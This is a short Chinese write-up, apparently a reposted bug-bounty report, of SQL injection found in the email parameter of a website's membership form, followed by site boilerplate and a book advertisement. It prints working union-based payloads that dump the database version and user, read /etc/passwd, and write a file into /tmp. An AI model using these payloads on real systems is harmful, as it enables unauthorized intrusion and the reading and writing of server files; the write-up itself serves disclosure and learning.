我像往常一样注册网站会员
然后通过POST方法将表单信息发送到 https://www.blablabla.com/svc/*****/form_affiliate。
这里的email参数存在 SQL 注入漏洞
于是我在请求框 [email=””]参数中插入SQL语句
' and 1=2 union all select concat_ws(0x3a,version(),user(),database())--+
结果在响应窗口显示 “5.5.41-log:root@10.130.0.1:tp_cart”。
现在我尝试使用SQL命令来读取文件
' and 1=2 union all select load_file('/etc/passwd')--+
接着尝试在/tmp目录写入文件
' and 1=2 union all select 'blablalba_bug_bounty_program' into outfile '/tmp/blablabla'--+
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 优化ElasticSearch写入效率
- golang 创建,读取,写入文件
- Kafka学习笔记 -- 写入数据
- Elasticsearch 写入原理深入详解
- 高频写入redis场景优化
- Laravel log 无法写入问题
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Netty实战
诺曼·毛瑞尔(Norman Maurer)、马文·艾伦·沃尔夫泰尔(Marvin Allen Wolfthal) / 何品 / 人民邮电出版社 / 2017-5-1 / 69.00
编辑推荐 - Netty之父”Trustin Lee作序推荐 - 阿里巴巴中间件高级技术专家为本书中文版作序推荐 - 系统而详细地介绍了Netty的各个方面并附带了即用型的优质示例 - 附带行业一线公司的案例研究 - 极实用的Netty技术书 无论是构建高性能的Web、游戏服务器、推送系统、RPC框架、消息中间件还是分布式大数据处理引擎,都离不开Nett......一起来看看 《Netty实战》 这本书的介绍吧!